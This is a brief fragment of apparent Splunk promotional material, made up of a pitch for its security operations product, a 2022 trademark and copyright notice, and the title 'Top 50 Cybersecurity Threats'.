modernize your SOC using Splunk’s data-centric security operations solution.

Splunk, Splunk> and Turn Data Into Doing are trademarks and registered trademarks of Splunk Inc. in the United States and other countries. All
other brand names, product names or trademarks belong to their respective owners. © 2022 Splunk Inc. All rights reserved.

Top 50 Cybersecurity Threats